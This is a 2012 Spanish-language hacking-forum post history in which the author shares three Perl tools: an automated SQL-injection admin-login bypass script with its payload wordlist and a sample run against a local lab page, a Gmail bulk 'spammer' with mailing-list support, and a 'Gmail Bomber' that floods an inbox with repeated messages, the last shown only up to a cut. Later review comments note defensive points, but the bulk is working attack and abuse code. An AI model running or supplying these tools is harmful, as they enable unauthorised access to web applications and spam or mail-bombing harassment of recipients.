
Mensajes - BigBear

#371
Scripting / Re: [Perl] ByPass Admin 0.1
14 Marzo 2012, 19:38 PM
es lo que te habia dicho , para que el programa compruebe que realmente paso un bypass tiene tres opciones.

positivo : tenes que poner una porcion del texto que aparece cuando el login fue hecho ej "bienvenido administrador"

negativo : lo mismo que el positivo pero al contrario ej "acceso denegado"

automatico : una mala improvisacion mia , no la uses nunca xD.
#372
Scripting / Re: [Perl] ByPass Admin 0.1
14 Marzo 2012, 16:25 PM
buena pregunta , nunca lo supe xDD.
#373
Scripting / Re: [Perl] ByPass Admin 0.1
14 Marzo 2012, 16:14 PM
explorer ? , este programa nunca hubiera existido si vos no me hubieras ayudado , te pondria en los creditos pero se que estas cosas te disgustan xDD.
#374
Scripting / Re: [Perl] ByPass Admin 0.1
14 Marzo 2012, 14:09 PM
y si , es por eso que le puse 3 opciones para controlar eso (positivo,negativo,automatico).
La unica segura es la primera (positivo) que es cuando aparece (bienvenido admin).

#375
Scripting / [Perl] ByPass Admin 0.1
13 Marzo 2012, 18:50 PM
Acabo de terminar un programa que he estado haciendo estos últimos 3 días; se trata de un script hecho en Perl para realizar los famosos y míticos bypass en los paneles de administración. Lo bueno es que parsea todos los formularios encontrados en la página marcada para que todo sea más automático.

El programa depende de un archivo de texto llamado bypass.txt


admin'--
'or'1'='1
'or'
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
- ' or 'x'='x
- ' or 'x'='x
'or'1 ou 'or''='
' or 'x'='x
admin' or 1==1
' OR "='
'or'1'='1


El codigo (formateado con perltidy) es


#!usr/bin/perl
#ByPass Admin 0.1
#Coded By Doddy H

use LWP::UserAgent;
use HTML::Form;

# One LWP::UserAgent instance is shared by toma() and load() for every request.
my $nave = LWP::UserAgent->new;
# Every request carries this single fixed User-Agent value (note the missing
# space in "Gecko/20080201Firefox"), so the script's traffic can be matched on
# it in web-server logs. It is a weak indicator: the value is just a string.
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
# Per-request timeout, in seconds.
$nave->timeout(5);

# Print the banner, run the interactive session, then copyright() waits for
# Enter and exits.
head();
start();
copyright();

# Interactive driver: asks for a login-page URL, lists every form found on it,
# then submits each line of bypass.txt through the chosen form and reports a
# payload whose response passes the selected check.
#
# Defender view: one run produces one request per wordlist line against the
# same endpoint, each carrying the same SQL-tautology string in every
# non-submit field. The server-side fix is a parameterised query for the login
# lookup; the request pattern itself is easy to rate-limit and alert on.
sub start {
    print "\n\n[+] Admin : ";
    # The URL is used exactly as typed; nothing validates it before the fetch.
    chomp( my $url = <STDIN> );

    my $code = toma($url);

    # Parse every form in the fetched page, with "/" passed as the base URI.
    my @testar = HTML::Form->parse( $code, "/" );

    # $count (and @inputs / $in below) are undeclared package globals; this
    # only compiles because the file has no `use strict`.
    $count = 0;
    foreach my $test (@testar) {
        $count++;
        print "\n\n -- == Form $count == --\n\n";
        # `name` is a bareword here, treated as the string "name".
        if ( $test->attr(name) eq "" ) {
            print "[+] Name : No Found" . "\n";
        }
        else {
            print "[+] Name : " . $test->attr(name) . "\n";
        }
        print "[+] Action : " . $test->action . "\n";
        print "[+] Method : " . $test->method . "\n";
        print "\n-- == Input == --\n\n";
        @inputs = $test->inputs;

        foreach $in (@inputs) {

            print "\n[+] Type : " . $in->type . "\n";
            print "[+] Name : " . $in->name . "\n";
            print "[+] Value : " . $in->value . "\n";

        }
    }

    # 1-based form number as printed above; load() converts it to an index.
    print "\n\n[+] Form to crack : ";
    chomp( my $op = <stdin> );

    # Name of the submit control to send along with the form fields.
    print "\n[+] Submit : ";
    chomp( my $aca = <stdin> );

    print "\n[+] Options to check\n\n";
    print "1 - Positive\n";
    print "2 - Negative\n";
    print "3 - Automatic\n\n";
    print "[+] Option : ";
    chomp( my $op2 = <stdin> );

    my @bypass = loadword();

    # Mode 1 (positive): a hit is a response that contains the given text.
    if ( $op2 eq "1" ) {
        print "\n[+] String : ";
        chomp( my $st = <stdin> );
        print "\n\n[+] Cracking login....\n\n";
        for my $by (@bypass) {
            chomp $by;
            my $code = load( $url, $code, $op, $aca, $by );
            # $st is interpolated as a regex without quoting, so any regex
            # metacharacters typed by the operator are interpreted.
            if ( $code =~ /$st/ig ) {
                # cracked() ends in copyright(), which exits the process, so
                # the loop stops at the first hit.
                cracked( $url, $by );
            }
        }
        print "\n[+] Finished\n";
    }

    # Mode 2 (negative): a hit is any response that does NOT contain the text.
    # An error page or an empty body also lacks the text, so this mode reports
    # false positives for anything other than the normal failure page.
    if ( $op2 eq "2" ) {
        print "\n[+] String : ";
        chomp( my $st = <stdin> );
        print "\n\n[+] Cracking login....\n\n";
        for my $by (@bypass) {
            chomp $by;
            my $code = load( $url, $code, $op, $aca, $by );
            unless ( $code =~ /$st/ig ) {
                cracked( $url, $by );
            }
        }
        print "\n[+] Finished\n";
    }

    # Mode 3 (automatic): a hit is any response that differs byte-for-byte
    # from the response to one dummy value. Any per-request content in the
    # page makes every response "different", so the result is unreliable.
    if ( $op2 eq "3" ) {
        print "\n\n[+] Cracking login....\n\n";
        my $prueba_falsa = load( $url, $code, $op, $aca, "fuck you" );
        for my $by (@bypass) {
            chomp $by;
            my $code = load( $url, $code, $op, $aca, $by );
            unless ( $code eq $prueba_falsa ) {
                cracked( $url, $by );
            }
        }
        print "\n[+] Finished\n";
    }

}

# Submit form number $op of the page source $code to $url, putting $text in
# every field except the submit control named $aca, and return the response
# body. POST forms are sent with $nave->post; any other method is sent as a
# GET with a hand-built query string.
#
# Defender view: every non-submit input, hidden fields included, receives the
# same value, which is an unusual and easily matched request shape.
sub load {

    my ( $url, $code, $op, $aca, $text ) = @_;

    # The operator enters a 1-based form number; make it a 0-based index.
    $op--;
    # Re-parse the page and keep only the selected form (a one-element list).
    my @probar = ( HTML::Form->parse( $code, "/" ) )[$op];

    for my $testa (@probar) {
        if ( $testa->method eq "POST" ) {

            my @inputs = $testa->inputs;
            for my $in (@inputs) {
                if ( $in->type eq "submit" ) {
                    if ( $in->name eq $aca ) {
                        push( @botones_names,  $in->name );
                        push( @botones_values, $in->value );
                    }
                }
                else {
                    # NOTE(review): @ordenuno, @botones_names and
                    # @botones_values are package globals that are never
                    # cleared, so they keep growing across calls and each
                    # POST repeats the pairs from all earlier calls.
                    push( @ordenuno, $in->name, $text );
                }
            }

            my @preuno = @ordenuno;
            push( @preuno, $botones_names[0], $botones_values[0] );
            # Always posts to the URL the operator typed, not to the form's
            # own action attribute.
            my $codeuno = $nave->post( $url, \@preuno )->content;

            return $codeuno;

        }
        else {

            my $final    = "";
            my $orden    = "";
            my $partedos = "";

            my @inputs = $testa->inputs;
            # The inner loop variable reuses the name $testa and hides the
            # form object for the duration of the loop.
            for my $testa (@inputs) {

                if ( $testa->name eq $aca ) {

                    push( @botones_names,  $testa->name );
                    push( @botones_values, $testa->value );
                }
                else {
                    # The value is concatenated into the query string with no
                    # URL encoding.
                    $orden .= '' . $testa->name . '=' . $text . '&';
                }
            }
            # Drop the trailing "&".
            chop($orden);

            # These two `my` declarations redeclare $partedos and $final from
            # the top of this branch.
            my $partedos = "&" . $botones_names[0] . "=" . $botones_values[0];
            my $final    = $url . "?" . $orden . $partedos;

            # $codedos is an undeclared package global.
            $codedos = toma($final);
            return $codedos;
        }
    }
}

# Report a hit: print the URL ($_[0]) and the payload ($_[1]), append both to
# logs-bypass.txt in the current directory, then call copyright(), which waits
# for Enter and exits the process.
# The log file is a persistent record of targets and payloads on the machine
# that ran the script.
sub cracked {
    print "[+] Login Cracked\n\n";
    print "[+] URL : $_[0]\n";
    print "[+] Bypass : $_[1]\n";
    savefile( "logs-bypass.txt", "[+] URL : $_[0]" );
    savefile( "logs-bypass.txt", "[+] Bypass : $_[1]\n" );
    copyright();
}

# Return the lines of bypass.txt (current directory) with newlines removed.
# If the file does not exist, print an error and call copyright(), which
# exits the process.
sub loadword {

    my $file = "bypass.txt";

    if ( -f $file ) {

        # Two-argument open on a bareword handle, result unchecked: if the
        # open fails the list is simply empty. The name is a fixed literal.
        open( FI, "bypass.txt" );
        my @txts = <FI>;
        close FI;
        chomp @txts;

        return @txts;

    }
    else {
        print "\n\n[-] Wordlist not found\n\n";
        copyright();
    }

}

# Print the ASCII-art program banner. No other effect.
sub head {
    print qq(

@@@@        @@@@@                       @        @         @     
@   @       @    @                      @        @               
@   @       @    @                     @ @       @               
@   @  @  @ @    @  @@@   @@   @@      @ @    @@@@ @@@ @@  @ @ @@
@@@@   @  @ @@@@@      @ @  @ @  @    @   @  @   @ @  @  @ @ @@  @
@   @  @  @ @       @@@@  @    @      @   @  @   @ @  @  @ @ @   @
@   @  @  @ @      @   @   @    @     @@@@@  @   @ @  @  @ @ @   @
@   @   @@  @      @   @ @  @ @  @   @     @ @   @ @  @  @ @ @   @
@@@@    @   @       @@@@  @@   @@    @     @  @@@@ @  @  @ @ @   @
         @                                                         
       @@                                                         



);
}

# Print the credit line, wait for one line on standard input, then terminate.
# The exit status is 1 on every path, including a normal run.
sub copyright {
    print "\n\n(C) Doddy Hackman 2012\n\n";
    <stdin>;
    exit(1);
}

# Append the text $_[1] plus a newline to the file named $_[0].
# NOTE(review): two-argument open with the ">>" mode glued onto the name, a
# bareword handle and no check of the result; a failed open is silent. The
# only callers visible here pass a fixed file name.
sub savefile {
    open( SAVE, ">>" . $_[0] );
    print SAVE $_[1] . "\n";
    close SAVE;
}

# GET the URL in $_[0] with the shared client and return the response body.
# The HTTP status is not inspected, so the body of an error response is
# returned like any other page.
sub toma {
    return $nave->get( $_[0] )->content;
}

#The End ?


Un ejemplo de uso




@@@@        @@@@@                       @        @         @
@   @       @    @                      @        @
@   @       @    @                     @ @       @
@   @  @  @ @    @  @@@   @@   @@      @ @    @@@@ @@@ @@  @ @ @@
@@@@   @  @ @@@@@      @ @  @ @  @    @   @  @   @ @  @  @ @ @@  @
@   @  @  @ @       @@@@  @    @      @   @  @   @ @  @  @ @ @   @
@   @  @  @ @      @   @   @    @     @@@@@  @   @ @  @  @ @ @   @
@   @   @@  @      @   @ @  @ @  @   @     @ @   @ @  @  @ @ @   @
@@@@    @   @       @@@@  @@   @@    @     @  @@@@ @  @  @ @ @   @
         @
       @@





[+] Admin : http://localhost/labs/bypass/primero.php


-- == Form 1 == --

[+] Name : No Found
[+] Action : /
[+] Method : POST

-- == Input == --


[+] Type : text
[+] Name : usuario
[+] Value :

[+] Type : password
[+] Name : password
[+] Value :

[+] Type : submit
[+] Name : logeo
[+] Value : Entrar


[+] Form to crack : 1

[+] Submit : logeo

[+] Options to check

1 - Positive
2 - Negative
3 - Automatic

[+] Option : 1

[+] String : exitoso


[+] Cracking login....

[+] Login Cracked

[+] URL : http://localhost/labs/bypass/primero.php
[+] Bypass : 'or'1'='1


(C) Doddy Hackman 2012

#376
Scripting / Re: [Perl] DH Spammer 0.1
5 Marzo 2012, 02:04 AM
Cita de: H20-X en  4 Marzo 2012, 19:56 PM
que pena que no sea en py o en rb a mi en perl no me va :-\

al principio tenia pensado hacerlo en Python pero en Perl hay un modulo llamado Email::Send::SMTP::Gmail que me tiene todo el tema de envio de mails resumido.
#377
Scripting / Re: [Perl] DH Spammer 0.1
2 Marzo 2012, 19:23 PM
no se me habia ocurrido eso , gracias por la sugerencia.
#378
Scripting / [Perl] DH Spammer 0.1
1 Marzo 2012, 22:21 PM
Hola a todos , aca les traigo un programa que hice para mandar mails con las siguientes opciones.

  • Mensajes que permitan codigo HTML.
  • Adjuntar archivos
  • Mandar la cantidad que quieran
  • Se maneja con una lista de correos (para poder enviar el mismo mail a varios correos)

    Para usarlo necesitan una cuenta Gmail para indicarle al programa que los mensajes van a ser enviados desde esa cuenta.

    Una imagen del programa


    El codigo (formateado con perltidy) es ...........


    #!usr/bin/perl
    #DH Spammer 0.1
    #Coded By Doddy H
    #Dependencies
    #http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm
    #http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm
    #http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
    #ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
    #http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod
    #Based on http://robertmaldon.blogspot.com/2006/10/sending-email-through-google-smtp-from.html

    use Tk;
    use Tk::ROText;
    use Tk::FileSelect;
    use Email::Send::SMTP::Gmail;
    use Net::SMTP::SSL;
    use Cwd;

    # NOTE: `use` is resolved at compile time, so Win32::Console is loaded on
    # every platform; the $^O test only guards the Free() call, which detaches
    # the process from its console window.
    if ( $^O eq 'MSWin32' ) {
        use Win32::Console;
        Win32::Console::Free();
    }

    # Colours applied to every widget below.
    my $color_fondo = "black";
    my $color_texto = "white";

    # Main window: fixed size, not resizable.
    my $ve =
      MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
    $ve->geometry("920x560+20+20");
    $ve->resizable( 0, 0 );
    $ve->title("DH Spammer 0.1 (C) Doddy Hackman 2012");

    # Menu bar frame and its four menu buttons. $d is an undeclared package
    # global (the file has no `use strict`).
    $d = $ve->Frame(
        -relief     => "sunken",
        -bd         => 1,
        -background => $color_fondo,
        -foreground => $color_texto
    );
    my $ma = $d->Menubutton(
        -text             => "Mails",
        -underline        => 1,
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->pack( -side => "left" );
    my $op = $d->Menubutton(
        -text             => "Options",
        -underline        => 1,
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->pack( -side => "left" );
    my $ab = $d->Menubutton(
        -text             => "About",
        -underline        => 1,
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->pack( -side => "left" );
    my $ex = $d->Menubutton(
        -text             => "Exit",
        -underline        => 1,
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->pack( -side => "left" );
    $d->pack( -side => "top", -fill => "x" );

    # "Mails" menu: manage the recipient list.
    $ma->command(
        -label      => "Add Mailist",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&addmailist
    );
    $ma->command(
        -label      => "Add Mail",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&addmail
    );
    $ma->command(
        -label      => "Clean List",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&delist
    );

    # "Options" menu: start sending, pick an attachment, reset the form.
    $op->command(
        -label      => "Spam Now",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&spamnow
    );
    $op->command(
        -label      => "Add Attachment",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&addfile
    );
    $op->command(
        -label      => "Clean All",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&clean
    );

    $ab->command(
        -label      => "About",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&about
    );
    $ex->command(
        -label      => "Exit",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&chali
    );

    # Sender account section. Both entries start with sample text; the
    # password entry is only masked on screen (-show "*"), its value is read
    # in clear with ->get by spamnow().
    $ve->Label(
        -text       => "Gmail Login",
        -font       => "Impact3",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 100, -y => 40 );

    $ve->Label(
        -text       => "Username : ",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 20, -y => 80 );
    my $user = $ve->Entry(
        -width      => 30,
        -text       => 'lagartojuancho@gmail.com',
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -y => 83, -x => 85 );

    $ve->Label(
        -text       => "Password : ",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 20, -y => 120 );
    my $pass = $ve->Entry(
        -show       => "*",
        -width      => 30,
        -text       => 'Secret',
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -y => 123, -x => 85 );

    # Message section: copies per recipient, attachment path ("None" means no
    # attachment), subject and body.
    $ve->Label(
        -text       => "Message",
        -font       => "Impact3",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 110, -y => 160 );

    $ve->Label(
        -text       => "Number : ",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 20, -y => 210 );
    my $number = $ve->Entry(
        -width      => 5,
        -text       => "1",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 75, -y => 212 );

    $ve->Label(
        -text       => "Attachment : ",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 20, -y => 240 );
    my $fi = $ve->Entry(
        -text       => 'None',
        -width      => 30,
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 90, -y => 242 );

    $ve->Label(
        -text       => "Subject : ",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 20, -y => 270 );
    my $tema = $ve->Entry(
        -text       => "Hi idiot",
        -width      => 20,
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 73, -y => 273 );

    $ve->Label(
        -text       => "Body",
        -font       => "Impact3",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 110, -y => 310 );
    my $body = $ve->Scrolled(
        "Text",
        -width      => 30,
        -height     => 12,
        -background => $color_fondo,
        -foreground => $color_texto,
        -scrollbars => "e"
    )->place( -x => 45, -y => 350 );
    $body->insert( "end", "Welcome to the hell" );

    # Recipient list, filled by addmail() and addmailist().
    $ve->Label(
        -text       => "Mailist",
        -font       => "Impact3",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -y => 40, -x => 400 );
    my $mailist = $ve->Listbox(
        -height     => 31,
        -width      => 33,
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -y => 85, -x => 330 );

    # Read-only progress log written by spamnow().
    $ve->Label(
        -text       => "Console",
        -font       => "Impact3",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -y => 40, -x => 685 );
    my $console = $ve->Scrolled(
        "ROText",
        -width      => 40,
        -height     => 31,
        -background => $color_fondo,
        -foreground => $color_texto,
        -scrollbars => "e"
    )->place( -x => 580, -y => 84 );

    # Hand control to the Tk event loop; the subs below run as menu callbacks.
    MainLoop;

    # Open a small "Add Mailist" window with a path entry, a Browse button and
    # a Load button that appends every line of the chosen file to the
    # recipient list box.
    sub addmailist {

        my $adda = MainWindow->new(
            -background => $color_fondo,
            -foreground => $color_texto
        );
        $adda->geometry("400x90+20+20");
        $adda->resizable( 0, 0 );
        $adda->title("Add Mailist");

        $adda->Label(
            -text       => "Mailist : ",
            -background => $color_fondo,
            -foreground => $color_texto,
            -font       => "Impact1"
        )->place( -x => 10, -y => 30 );
        my $en = $adda->Entry(
            -background => $color_fondo,
            -foreground => $color_texto,
            -width      => 33
        )->place( -y => 33, -x => 75 );
        $adda->Button(
            -text             => "Browse",
            -background       => $color_fondo,
            -foreground       => $color_texto,
            -width            => 7,
            -activebackground => $color_texto,
            -command          => \&brona
        )->place( -y => 33, -x => 285 );
        $adda->Button(
            -text             => "Load",
            -background       => $color_fondo,
            -foreground       => $color_texto,
            -width            => 7,
            -activebackground => $color_texto,
            -command          => \&bronaxa
        )->place( -y => 33, -x => 340 );

        # NOTE(review): named subs are package-level in Perl even when written
        # inside another sub, and they bind to the $adda / $en of the first
        # addmailist() call only; a dialog opened later would still act on the
        # first dialog's widgets. Confirm before relying on repeated use.

        # Show a file chooser starting in the current directory and copy the
        # selection into the path entry. $browse is a package global.
        sub brona {
            $browse = $adda->FileSelect( -directory => getcwd() );
            my $file = $browse->Show;
            $en->configure( -text => $file );
        }

        # Read the file named in the entry and append each line to the list.
        # NOTE(review): two-argument open on text typed by the user, so any
        # mode or pipe characters in the name are interpreted by open; the
        # result is not checked. Lines are inserted without chomp. FILE and
        # @words are package globals.
        sub bronaxa {
            open( FILE, $en->get );
            @words = <FILE>;
            close FILE;

            for (@words) {
                $mailist->insert( "end", $_ );
            }
        }
    }

    # Open a small "Add File" window with a path entry, a Browse button and a
    # Load button that copies the path into the main window's attachment
    # field ($fi).
    sub addfile {

        my $addax = MainWindow->new(
            -background => $color_fondo,
            -foreground => $color_texto
        );
        $addax->geometry("390x90+20+20");
        $addax->resizable( 0, 0 );
        $addax->title("Add File");

        $addax->Label(
            -text       => "File : ",
            -background => $color_fondo,
            -foreground => $color_texto,
            -font       => "Impact1"
        )->place( -x => 10, -y => 30 );
        my $enaf = $addax->Entry(
            -background => $color_fondo,
            -foreground => $color_texto,
            -width      => 33
        )->place( -y => 33, -x => 55 );
        $addax->Button(
            -text             => "Browse",
            -background       => $color_fondo,
            -foreground       => $color_texto,
            -width            => 7,
            -activebackground => $color_texto,
            -command          => \&bronax
        )->place( -y => 33, -x => 265 );
        $addax->Button(
            -text             => "Load",
            -background       => $color_fondo,
            -foreground       => $color_texto,
            -width            => 7,
            -activebackground => $color_texto,
            -command          => \&bronaxx
        )->place( -y => 33, -x => 320 );

        # NOTE(review): bronax / bronaxx are package-level named subs and bind
        # to the $addax / $enaf of the first addfile() call only.

        # Show a file chooser starting in the current directory and copy the
        # selection into the path entry. $browse is a package global.
        sub bronax {
            $browse = $addax->FileSelect( -directory => getcwd() );
            my $filea = $browse->Show;
            $enaf->configure( -text => $filea );
        }

        # Copy the entered path into the main window's attachment field. The
        # path is not checked for existence here.
        sub bronaxx {
            $fi->configure( -text => $enaf->get );
        }
    }

    # Open a small "Add Mail" window with one entry and an Add button that
    # appends the typed address to the recipient list box.
    sub addmail {

        my $add = MainWindow->new(
            -background => $color_fondo,
            -foreground => $color_texto
        );
        $add->geometry("350x90+20+20");
        $add->resizable( 0, 0 );
        $add->title("Add Mail");

        $add->Label(
            -text       => "Mail : ",
            -background => $color_fondo,
            -foreground => $color_texto,
            -font       => "Impact1"
        )->place( -x => 10, -y => 30 );
        my $ew = $add->Entry(
            -background => $color_fondo,
            -foreground => $color_texto,
            -width      => 33
        )->place( -y => 33, -x => 60 );
        $add->Button(
            -text             => "Add",
            -background       => $color_fondo,
            -activebackground => $color_texto,
            -foreground       => $color_texto,
            -width            => 7,
            -command          => \&addnow
        )->place( -y => 33, -x => 275 );

        # Append the entry's text to the list as typed; the value is not
        # validated as an address. NOTE(review): addnow is a package-level
        # named sub and binds to the $ew of the first addmail() call only.
        sub addnow {
            $mailist->insert( "end", $ew->get );
        }

    }

    # Remove every entry from the recipient list box.
    sub delist {
        $mailist->delete( 0.0, "end" );
    }

    # "Spam Now" callback: verify the account credentials with one SMTP login,
    # then send the message to every address in the list box, with or without
    # an attachment, logging progress to the console widget.
    #
    # Defender view: the script has no delay or throttling of its own, so the
    # volume is bounded only by the list length and the "Number" field; the
    # sending limits and abuse controls of the mail provider are what apply.
    sub spamnow {

        $console->delete( 0.1, "end" );

        my $control = "0";

        # Credential check over SMTP on port 465. NOTE(review): the return
        # value of new() is not checked, so a failed connection would make the
        # ->auth call below die on an undefined value.
        my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 );
        if ( $msg->auth( $user->get, $pass->get ) ) {
            $control = "1";
        }
        else {
            $control = "0";
        }
        $msg->quit();

        if ($control) {

            $console->insert( "end", "[+] Starting the Party\n\n" );

            my @mails = $mailist->get( "0.0", "end" );
            chomp @mails;
            for my $mail (@mails) {
                # Let Tk redraw between recipients; sending runs inside the
                # callback and otherwise blocks the window.
                $ve->update;
                $console->insert( "end", "[+] Mail : $mail\n" );

                my $text = $body->get( "1.0", "end" );

                # The literal text "None" in the attachment field selects the
                # plain-message path.
                if ( $fi->get eq "None" ) {
                    singlemail( $user->get, $pass->get, $mail, $tema->get, $text,
                        $number->get );
                }
                else {
                    singlemailwithfile( $user->get, $pass->get, $mail, $tema->get,
                        $text, $fi->get, $number->get );
                }
            }
            $console->insert( "end", "\n\n[+] Finished" );
        }
        else {
            $console->insert( "end", "[-] Bad Login\n" );
        }
    }

    # Send $cantidad copies of an HTML message from $user to $target through
    # smtp.gmail.com port 465, opening and authenticating a new SMTP session
    # for every copy. No return value; no SMTP call result is checked.
    sub singlemail {

        my ( $user, $password, $target, $asunto, $mensaje, $cantidad ) = @_;

        for ( 1 .. $cantidad ) {
            my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 );
            $msg->auth( $user, $password );
            # A newline is appended to both envelope addresses.
            $msg->mail( $user . "\n" );
            $msg->to( $target . "\n" );
            $msg->data();
            # NOTE(review): header lines are built by plain concatenation from
            # the GUI field values; nothing strips line breaks from them.
            $msg->datasend( "From: " . $user . "\n" );
            $msg->datasend( "To: " . $target . "\n" );
            $msg->datasend( "Subject: " . $asunto . "\n" );
            # The body is declared as HTML, so the recipient's mail client
            # treats the body text as markup.
            $msg->datasend("Content-Type: text/html \n");
            $msg->datasend("\n");
            $msg->datasend( $mensaje . "\n" );
            $msg->dataend();
            $msg->quit();
        }
    }

    # Send $cantidad copies of a message with the attachment $file to $target
    # using Email::Send::SMTP::Gmail. Unlike singlemail(), one session is
    # created and reused for all copies. No result is checked.
    sub singlemailwithfile {

        my ( $user, $password, $target, $asunto, $mensaje, $file, $cantidad ) = @_;

        my $mail = Email::Send::SMTP::Gmail->new(
            -smtp  => "gmail.com",
            -login => $user,
            -pass  => $password
        );
        # The loop variable is only a counter; it is not used in the body.
        for my $number ( 1 .. $cantidad ) {
            $mail->send(
                -to          => $target,
                -subject     => $asunto,
                -body        => $mensaje,
                -attachments => $file
            );
        }
        $mail->bye;
    }

    # "Clean All" callback: reset the form. Text entries are set to a single
    # space (not an empty string), the attachment field goes back to "None",
    # and the body, recipient list and console are emptied.
    sub clean {

        $user->configure( -text => " " );
        $pass->configure( -text => " " );
        $number->configure( -text => " " );
        $fi->configure( -text => "None" );
        $tema->configure( -text => " " );
        $body->delete( 0.1, "end" );
        $mailist->delete( 0.0, "end" );
        $console->delete( 0.1, "end" );

    }

    # Open a fixed-size "About" window with the author's contact lines.
    # $about is an undeclared package global; colours are hard-coded here
    # instead of using $color_fondo / $color_texto.
    sub about {
        $about = MainWindow->new( -background => "black" );
        $about->title("About");
        $about->geometry("300x110");
        $about->resizable( 0, 0 );
        # Empty label used as vertical spacing.
        $about->Label( -background => "black", -foreground => "white" )->pack();
        $about->Label(
            -text       => "Contact : lepuke[at]hotmail[com]",
            -font       => "Impact",
            -background => "black",
            -foreground => "white"
        )->pack();
        $about->Label(
            -text       => "Web : doddyhackman.webcindario.com",
            -font       => "Impact",
            -background => "black",
            -foreground => "white"
        )->pack();
        $about->Label(
            -text       => "Blog : doddy-hackman.blogspot.com",
            -font       => "Impact",
            -background => "black",
            -foreground => "white"
        )->pack();
    }

    # "Exit" menu callback: terminate the process. The exit status is 1 even
    # though this is the normal way to close the program.
    sub chali { exit(1); }

    #The End ?

#379
Scripting / [Perl] Gmail Bomber 0.3
23 Febrero 2012, 17:39 PM
Hola a todos , aca les traigo un gmail bomber que hice para el torneo de programacion de HackXCrack , se trata de un simple mail bomber para Gmail , aca les dejo una imagen del programa en uso donde me envio 40 mensajes a mi cuenta


Y mi casilla quedo asi


El codigo del programa (formateado con perltidy) es


#!usr/bin/perl
#Gmail Bomber 0.2
#Dependencies
#http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm
#http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm
#http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
#ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
#http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod

use Tk;
use Win32;
use Email::Send::SMTP::Gmail;

# NOTE: `use` is resolved at compile time, so Win32::Console is loaded
# regardless of the $^O test; only the Free() call is guarded. The file also
# has an unconditional `use Win32;` and calls Win32::MsgBox, so it is written
# for Windows.
if ( $^O eq 'MSWin32' ) {
    use Win32::Console;
    Win32::Console::Free();
}

# Colours applied to every widget below.
my $color_fondo = "black";
my $color_texto = "green";

# Main window: fixed size, not resizable.
my $ve =
  MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
$ve->geometry("300x600+20+20");
$ve->resizable( 0, 0 );
$ve->title("Gmail Bomber 0.2");

# Sender account section. Both entries start with sample text; the password
# entry is only masked on screen (-show "*") and is read in clear by start().
$ve->Label(
    -text       => "Login",
    -font       => "Impact3",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 110, -y => 30 );

$ve->Label(
    -text       => "Username : ",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 80 );
my $user = $ve->Entry(
    -width      => 30,
    -text       => 'lagartojuancho@gmail.com',
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -y => 83, -x => 85 );

$ve->Label(
    -text       => "Password : ",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 120 );
my $pass = $ve->Entry(
    -show       => "*",
    -width      => 30,
    -text       => 'Secret',
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -y => 123, -x => 85 );

# Message section: number of copies, single recipient, subject and body.
$ve->Label(
    -text       => "Message",
    -font       => "Impact3",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 110, -y => 160 );

$ve->Label(
    -text       => "Number : ",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 210 );
my $number = $ve->Entry(
    -width      => 5,
    -text       => "20",
    -background => $color_fondo,
    -foreground => $color_texto
